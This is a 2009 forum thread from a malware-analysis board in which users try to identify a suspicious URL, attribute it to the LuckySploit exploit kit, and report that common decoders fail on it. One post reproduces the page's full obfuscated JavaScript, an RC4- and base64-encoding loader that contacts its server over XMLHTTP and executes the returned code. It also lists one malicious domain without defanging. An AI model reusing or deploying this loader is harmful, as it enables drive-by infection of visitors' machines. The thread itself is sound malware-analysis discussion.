Malware Domain List

Malware Related => Malware Analysis => Topic started by: sualck on May 27, 2009, 12:57:10 pm

Title: JavaScript
Post by: sualck on May 27, 2009, 12:57:10 pm
What is it?

hxxp://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7
Title: Re: JavaScript
Post by: RS-232 on May 27, 2009, 02:13:01 pm
...According to Kaspersky,it appears to be a LuckySploit variant:
http://virusscan.jotti.org/en/scanresult/ad5ef483c8cec20e4ec86332ab1126e881faabde (http://virusscan.jotti.org/en/scanresult/ad5ef483c8cec20e4ec86332ab1126e881faabde)
But I'm certainly not the js guru around,meaning you'll probably have to wait a bit in order to get a more detailed answer...  :)

PS:By the way,both jsunpack and Wepawet seemed to have troubles deciphering this one...  :(
Title: Re: JavaScript
Post by: SysAdMini on May 27, 2009, 02:23:02 pm
What is it?

hxxp://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7

The url format and the fact that the script is gzip compressed are indicators for Luckysploit.
Unfortunately Malzilla is unable to decode it and Wepawet fails too.

Same problem occurs at
Code: [Select]
poppka.net/pore/?7876256053563003de306eb5c094240d
Title: Re: JavaScript
Post by: JohnC on May 30, 2009, 09:24:48 pm
What is it?

hxxp://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7

The url format and the fact that the script is gzip compressed are indicators for Luckysploit.
Unfortunately Malzilla is unable to decode it and Wepawet fails too.

Same problem occurs at
Code: [Select]
poppka.net/pore/?7876256053563003de306eb5c094240d


From cameronzfunz

Code: [Select]
<html><body><script>actus=7677;atre=7;absens='o';valent=2;segnis='l';laus='m';collem='Ms';silvis="c";adfatu=6;curro=616;tutior=2916;delum=79;lisci=917;sidit=5086;alter=9;pisces=1;crook="9";parua=78;slip="52";fluens="n";reddar="o";troius='self';pelagi=2616;nodiqu="s";sturt=1155;eximia=234;pedis='par';fletus=938;subita='y';resono="espo";promam='2.18e2';texant=8210;orabat=5;snout='ML';vesta='';epulae="v";sulcus=244;slim="d";abis="me";scrub='t';fruges="684";summas='f';fumea=52;duros='h';passis='de';unum=0;animum='8e0';conixi='in';grates='win';volvis='E';orbo='est(';vident='nt';festa="te";legat='[';tribui=407;stavit='237';menses=256;erique='w';nigra='peo';laver='ow';miscet="0.2";capta='ew';redet=663;inibam=349;etimus='W';laude=3356;impius="";atrae="setAtt";gravem=933;quaero=81;poker='entW';autque=6263;sniper="i";voti=4;duck='3.';auibus=432;doce=83;quinta="942";sparso='do';factio=' ';evenam=47;matres=118;nullam="8";bung="t";ecloga='i';tute='!';motum='onre';riget=534;rhemum='][U';levent=2946;recens="6.38e2";bodger=39;tonsis='u';spque='pa';sidam='NIQ]';pallae='x';uisuri='GHIJK';chook="a";volant=2757;quod=8;legus=".7945";ducens='le';kylie='IQ';dentur='k';mensae='qr';sparsa="St";latine="75";milia='unc';aptabo='1.';aequem='re';auito='Mic';uocant='cti';vivum='e';brekky=474;numine='r';avido='R';ripis='3';tendam=5186;victui='nop';secus=3477;adires='a';gibson=".28";hatter=9246;amavit=3;milk='indow';frib=238;fugere='#';moveat='X';versa='7';banana=4391;fuci=(636,''+'A'+'B'+'C'+'D'+'E'+'F'+'');qualis=(8898,'ring');function actis(vellem){aequae=new vellem()}function videro(curru,armari){for(dicunt=0;dicunt<curru;dicunt++)armari[dicunt]=dicunt}function atye(cptae,water){for(dicunt=0;dicunt<cptae;dicunt++){absim=(absim+aequae[dicunt]+water[fixit](dicunt%water[uritis]))%cptae;herbam=aequae[dicunt];aequae[dicunt]=aequae[absim];aequae[absim]=herbam}}function bull(feci,ducem){dicunt=(dicunt+1)%ducem;absim=(absim+aequae[dicunt])%ducem;vealer();aequae[absim]=herbam;good(feci)}function vealer(hamis){herbam=aequae[dicunt];aequae[dicunt]=aequae[absim]}function good(diriit){dent+=amnesaai[eaque](diriit[fixit](silici)^aequae[(aequae[dicunt]+aequae[absim])%256])}function spiris(feci){for(silici=0;silici<feci[uritis];silici++){bull(feci,256)}}function abiere(vacare){dicunt=vacare;absim=vacare}potius=(auibus,fallas);modo=(0.4600>=6e0?.1:'a');('0.5'<2.2e1?potius:5.)((1<=2.8e2?this:4));infit=(.837>7.527e3?0.8:imus);fuci+=(4.52e2<0.419?3e0:uisuri+'LMNO');timeas=(5596.,noxam);natos=("313."<doce?.47:censes);reel=(latine>=bodger?adnant:matres);clarusttr=(9.<=18?timeas:.4);sirius=("589">0.95?natos:parua)[(792<0.4e1?sturt:"doc"+"ume"+"nt")];eaque=(.9,'fro')+(4.,'mC')+(8022,''+duros+'a'+'r'+'')+(86,'C')+(5853>8807.?38:'ode');uritis=('91'<5.5e1?.9895:ducens)+(6.04e2<=1?.3695:'ng')+(9e1>="0.4"?'th':.721);amnesaai=(atre,sirius)[("24."<3.71e2?'pa'+'re'+'nt'+'Win'+'d'+'ow':.4795)][(quinta<4.7e1?6229:''+'w'+'i'+'n'+'d'+'o'+'w'+'')][(0.542,''+'S'+'')+(358.,'t')+(.956,qualis)];fuci+=(5<5e1?vesta+'P'+'Q'+avido+'S'+'T'+'U'+'':954.)+(4115.>892.?'VWXY'+'Z':2798);averna=(25.<=8.7e1?'r'+'a'+'y'+'':226);pota=('1.1e1'>=5.669e3?4.194e3:'ath');uere=(4,reel);flecti=(7130,milia)+(levent>=4.753e3?5.983e3:vesta+'t'+ecloga+'o'+'n'+vesta);nescii=(940.>=quod?sirius:650);try{tonsae=('143'<=quaero?5:'er')+(0.65,'Da');errem=(8.55e2,fugere);aliam=(795.,''+spque+'');dolori=(.83<='0.359'?2.5e1:'d'+vivum+'fa'+'u'+'l'+'t'+vesta);errent=(4e0,errem);var suorum=(orabat,nescii)[(8.36e2,""+silvis+"r"+"ea"+festa+"El"+"e"+abis+fluens+bung+"")]((163>.1?'s':5.2e1)+(atre>=4469?0.5e1:aliam)+(38,'n'+vesta));apum=(pelagi,errem)+(7580,dolori)+(0.3565,errent)+(0.9225>"131"?203:'us'+vesta)+(9373,tonsae)+(.1,'ta');(2<=8.944e3?suorum:273)[("7487"<=6.?7.9e1:""+chook+"d"+slim+"B"+"e"+"h"+chook+epulae+sniper+reddar+"r"+"")]((50,apum));("0.41">=2?4653:nescii)[(9.,""+"b"+reddar+slim+"y"+impius)][("0.60">=.5993?""+chook+"p"+"p"+"e"+fluens+slim+"C"+"h"+sniper+"l"+"d"+impius:6.238e3)]((7789.>6729.?suorum:5e0));(2.049e3<=0.6364?.29:suorum)[(6e0<="348"?"loa"+"d":5e0)]((7.14e2,'[HASH'+']'+'[UNIQ]'));if((actus,suorum)[(3,"X"+"M"+"L"+"D"+"oc"+"um"+"en"+"t")][('.733'>=479?1511:""+"do"+silvis+"u"+"me"+"nt"+"Ele"+"m"+"e"+"nt")][(8.21e2,chook+"t"+"tr"+"ib"+"u"+"te"+"s"+impius)][(5.19e2>=8611?8:uritis)]==(4.6e1>=nullam?unum:9.)){(.2907,suorum)[(1.6e1<'8.031e3'?atrae+"ribute"+impius:3e0)](('54'>=.21?'last':5941.)+(876>'40'?''+scrub+ecloga+'m'+'e'+vesta:4.62e2),new ("7"<=56.?Date:4)());(voti<='3545'?suorum:4.75e2)[(2134.<=0.9073?4e0:"s"+"av"+"e")]((9590.,''+'[H'+'A'+'S'+'H'+rhemum+'NI'+'Q]'+vesta))}else{modo+=(7e0>=.3?'!':3.18e2)}}catch(ascani){}fuci+=(tribui<"39."?8.088e3:''+'a'+'b'+'c'+'d'+vivum+vesta)+(84>788.?quod:''+'f'+'g'+duros+'i'+'j'+dentur+'l'+'m'+'');compo=(6.>=quod?2581:vivum);disces=(548<=recens?nescii:3e0);agros=(amavit,cadis);landem=(".6021">=0.7312?0.38:'va');fuci+=(4.7e1,victui+mensae+'stu')+(9.159e3<=2133.?0.7e1:'vw'+'xy'+'z01'+'23'+'4')+(0.81,''+'5'+'6'+versa+'8'+'9'+'+'+'/'+'='+'');fixit=(683,'c'+'h'+vesta)+(54,adires+'rC'+'')+(4<=9.?vesta+'od'+'eA'+'t':7e0);if(('5.'>6?6:fuci)[(.8824<=8835?compo:4.8e1)+(6536<='.831'?.8:landem)+(fletus<=latine?5918:''+'l'+vesta)]){fuci=(2700.,'');disces=(2.71e2,fuci)}tendit=("15.">443?70.:vesta+'o'+'r'+adires+'g'+vivum+'');ulmo=(".184"<banana?'g'+'l'+vesta:69);sidus=(.8258,'ob'+adires+vesta);laxo=(185.>5e1?disces:.4);function cadis(angues,uanam,cavae,fudit){(440,actis)((.1>31?6.41e2:edereeea));("4843.">=inibam?videro:46)((tendam,256),(alter<="4.666e3"?aequae:9.56e2));(0.218,abiere)((.2,unum));(4.8e1>"69"?.5299:atye)((.576>9?.62:menses),(652>='.1'?angues:0.84));(animum>26?1:abiere)((876,unum));dent=(1.8e1>=184.?.350:'');(0.80,spiris)((1.86e2>='4.8e1'?uanam:9207.));return (6e0,dent)}uxoreseea=(.2596>=0.1?laxo:0.6);function adnant(bolam,noctum,levas,dong){var uertit;try{uocavi=(63.,vesta+'x'+'ml'+'2.'+'X');annoso=(volant,'H'+'TT'+'P'+vesta);dabor=(adfatu>='0.413'?uocavi:8e0)+(6817,'ML')+(8.2e1,annoso);uertit=new (3.184e3>'4.09e2'?edidityye:.7)((51.,collem)+(68>2.4e2?.6:dabor))}catch(road){try{annoso=(5>=.14?'HTTP':6.32e2);dabor=(3,vesta+'r'+absens+'s'+'o'+summas+vesta)+(37,'t.XML'+'')+(9.883e3>=.665?annoso:0.9);uertit=new (voti<606?edidityye:amavit)((5.<'241.'?auito:.74)+(5240<=5.9e1?9300:dabor))}catch(morsu){}}return (7546.,uertit)}transi=(7e0,uxoreseea)[(9.4e1,'par'+poker+milk)][(0.1e1>9.849e3?.21:'self')][('9'<720.?'wind'+'ow':1.23e2)][(versa<=3.2e1?vesta+summas+'r'+'a'+laus+'e'+'s'+'':95.)][(9e0<legus?1e0:vesta+'se'+'lf'+vesta)][(963,vesta+'F')+(4.5e1<'8728'?flecti:.539)];edidityye=(2.7e1<=305?uxoreseea:adfatu)[(845<'960'?spque+aequem+'nt'+etimus+'ind'+'ow'+'':0.3)][(4427<6.51e2?.31:vesta+'s'+vivum+'l'+'f'+vesta)][("6e0">7?4e0:''+'w'+conixi+'d'+laver+vesta)][(935.,'A')+(.9<=amavit?vesta+uocant:9993.)+(0.034e3<1?14:''+'v'+vivum+moveat+'')+(8.83e2,vesta+'O')+(7e0>=9879?4.477e3:'bject'+vesta)];rahrahazz=(1981.>secus?7.115e3:uxoreseea)[(9e0<9.4e1?spque+'r'+'en'+'tWi'+'nd'+'ow':9.)][(3.273e3<0.896?3.694e3:'self')][(659.,'M')+(eximia,pota)];edereeea=(9613,uxoreseea)[(14.,''+pedis+'en'+scrub+'Win'+'do'+erique)][(287<'7.01e2'?vesta+erique+ecloga+'n'+'d'+absens+erique+vesta:275)][(6.1e1>=181.?2.3e1:'A')+('308'<=7.?2.587e3:'r')+(1920.,averna)];fonsyye=new (7.45e2,edereeea)();anne=(amavit<=duck?'G':.62);turno=(2.33e2>9.57e3?riget:transi);ictuum=(.796<=4e0?modo:laude)+(crook>=0.2?clarusttr:.11)((31.,fuci),(2,30));verusaav=(67,alicui);tortis=(.2,'T');octo=(797<='.8'?514.:turno)((3.7e1,'ret')+(3e0>=4.695e3?.64:'urn '+'')+(2e0,''+'u'+vivum+'r'+'e'+'('+')'+vesta));termazz=(.3600,turno)((.95,vesta+'x'+vesta),('6'<=5.?5:subita),(miscet<=59.?vesta+numine+'e'+scrub+vesta:1292)+(.6186,'urn ')+(5.2e1,vesta+'ag'+numine+absens+'s'+'('+'x'+',y'+')'));parveiiy=(.7410,turno)((.6<612.?pallae:973),(0.71,'ret'+vesta)+(5154.<3.2e1?quod:'urn ')+(.5,vesta+summas+absens+numine+ecloga+'('+pallae+')'+vesta));viso=(4.1e1<3?.33:vesta+motum+vesta)+(612.,'adyst')+(8e0,'atec')+(.39<"8e0"?vesta+duros+'an'+'g'+vivum:2032);audies=(6198<"2.843e3"?7e0:volvis);(842.<=".5"?0.8286:parveiiy)((8e0<=stavit?ictuum:892.));function fori(colit,vellit,cocyto,coles){var areae=(1.021e3>gibson?octo:sidit)();("5.38e2"<=pisces?.209:areae)[(3.9e1>"4."?"open":.1)]((9425.<254?628.:anne)+(6e0,audies)+(autque>=4.?tortis:0.714),(9.75e2,vesta+'?'+vesta)+(valent>0.5640?verusaav:83.)((orabat<=9245.?termazz:958)((5e0>=88?.38:vesta+'pos'+'uiccc'+vesta),(fruges>=7.?colit:6852))),(55,true));                         areae[(806.,viso)]=(207,festi);function festi(){if((1.4e1,areae)[(1e0>='7.9e1'?texant:"ready"+sparsa+chook+festa)]==(845.,voti)&&(529,areae)[('8526'>=0.44e2?impius+"s"+bung+chook+"t"+"u"+"s"+impius:3.2e1)]==(1.,200)){('0.665e3'>8?turno:4.5e1)((0.1677<4968.?termazz:.5)((6.262e3>'881'?colit:27.),(5.985e3<'2.4e1'?0.9:infit)((7e0<=36?areae:7e0)[(.2092,"r"+resono+"ns"+"eText")])))()}};(.256,areae)[(0.5,impius+nodiqu+"e"+fluens+slim+"")]((5503.>415?unum:371))}function sinat(angues,coral,genta,olivae){  var batt=rahrahazz["floor"](rahrahazz["random"]()*angues[uritis]);cepi+=angues["substring"](batt,batt+1)}function volgo(uanam,angues,cepi,manabo){for(dicunt=0;dicunt<uanam;dicunt++){sinat(angues,dicunt,uanam,cepi);}}function noxam(angues,uanam,manabo,manent){cepi='';volgo(uanam,angues,cepi,manabo);return cepi}function alicui(memora,wright,turmae,equo){var ultor=('502.'<=brekky?0.46:'');var dent;var dicunt;var contos=(orabat>=3e0?unum:2.);var luco=('1603'<0.6711?5.383e3:pisces);dicunt=(2.68e2>4.2e1?unum:54.);for(dent=0;dicunt<memora[uritis];dicunt++,dent++){contos=contos*256+memora[fixit](dicunt);luco=luco*4;ultor=ultor+fuci["charAt"](parseInt(contos/luco));contos=contos%luco;if(luco==64){ultor=ultor+fuci["charAt"](parseInt(contos));contos=0;luco=1;dent++}if(dent>=75){dent=-1;ultor=ultor+'\n'}}if((.2<=atre?dicunt:pisces)%(0.538e3,3)){ultor=ultor+fuci["charAt"](parseInt(contos*((dicunt%3==1)?16:4)));ultor=ultor+((dicunt%3)==1?'==':amnesaai[eaque](61))}return (21,ultor)}function imus(memora,villis,posuit,certae){var ultor=("53.">=64.?8.3e2:'');var dicunt;var contos=(.45<=2?unum:75);var luco=(57,1);for(dicunt=0;dicunt<memora[uritis];dicunt++){if(memora["charAt"](dicunt)==amnesaai[eaque](61)||memora["charAt"](dicunt)=='\n')break;contos=contos*64+fuci["indexOf"](memora["charAt"](dicunt));luco=(luco==1?64:luco/4);if(luco!=64){ultor=ultor+amnesaai[eaque](parseInt(contos/luco));contos=contos%luco}}return (38,ultor)}function fallas(rooted,acies,hecate,scies){this[(1039>.7905?"cen"+"se"+nodiqu:.37)]=(7264,rooted);if(("1135">2.?rooted:0.3)[(7.23e2<=lisci?impius+"p"+chook+"r"+"e"+fluens+bung+"":72.)]==(83,rooted)){putans=(.982<8e0?adires:.53)}else{modo+=(0.2<556?'@':1.552e3)}}</script>